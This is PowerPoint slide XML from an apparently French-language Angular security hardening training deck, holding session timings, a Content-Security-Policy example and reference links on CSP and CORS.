              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>Content-Security-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>: script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t> ‘self’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>inline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" smtClean="0"/>
              <a:t> script , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>nor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>inline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="0"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36</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marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1000" baseline="0"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37</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a:xfrm>
            <a:off x="680562" y="4722694"/>
            <a:ext cx="5444490" cy="4929082"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t>https://www.w3.org/TR/CSP3/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t>https://content-security-policy.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1000" b="0" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1000" b="0" baseline="0"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38</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nl-NL"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39</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nl-NL" sz="1000" baseline="0"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4</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nl-NL"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40</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r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t>14h30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 15h00</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL"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41</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42</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43</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44</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marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR"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45</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a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="14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46</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sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{62786036-71D8-437F-9E1E-5A10E0A94061}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41503727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r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t>15h10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 15h45  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>roposer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>pause</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> de 10 min)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL"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50</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51</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marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL"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5</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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="0"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52</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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1"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53</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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1"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54</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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1000" b="0" baseline="0"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55</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r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>16h00  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t>16h30</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL"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56</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smtClean="0"/>
              <a:t>https://www.w3.org/TR/cors/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{62786036-71D8-437F-9E1E-5A10E0A94061}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39414401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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1"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58</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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1000" b="0"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59</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r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>Corriger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> à 17h</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL"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60</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r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>17h</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL"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61</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marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL"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6</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sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{62786036-71D8-437F-9E1E-5A10E0A94061}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41503727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sz="1000" b="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{62786036-71D8-437F-9E1E-5A10E0A94061}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41503727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sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{62786036-71D8-437F-9E1E-5A10E0A94061}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41503727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sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{62786036-71D8-437F-9E1E-5A10E0A94061}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41503727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r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Demo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>correction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> en solo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 17h20</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL"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66</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3966968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a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>17h20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"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67</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68</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69</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a:xfrm>
            <a:off x="162446" y="4722694"/>
            <a:ext cx="6480720" cy="4474131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="9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70</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71</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a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR"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7</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r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>17h30</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL"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72</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pPr>
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{62786036-71D8-437F-9E1E-5A10E0A94061}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3652028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7813" cy="3727450"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{62786036-71D8-437F-9E1E-5A10E0A94061}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396696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1">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96000" y="1047600"/>
            <a:ext cx="4950000" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3100" b="1">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2196000" y="2216700"/>
            <a:ext cx="4950000" cy="1115100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2000" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Groupe 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="903103">
            <a:off x="7236296" y="339502"/>
            <a:ext cx="1728192" cy="686981"/>
            <a:chOff x="6912768" y="104314"/>
            <a:chExt cx="2267744" cy="594478"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="ZoneTexte 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6948263" y="104314"/>
              <a:ext cx="2195736" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Angular</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t> Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Hardening</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t> training</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Accolades 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6912768" y="104314"/>
              <a:ext cx="2267744" cy="594478"/>
            </a:xfrm>
            <a:prstGeom prst="bracePair">
              <a:avLst>
                <a:gd name="adj" fmla="val 12172"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="50800">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:shade val="95000"/>
                  <a:satMod val="10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66610997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Content Basic ">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51200" y="283500"/>
            <a:ext cx="8741280" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="843558"/>
            <a:ext cx="8636880" cy="3722142"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="270000" indent="-270000">
              <a:buFont typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="4731990"/>
            <a:ext cx="637200" cy="273844"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
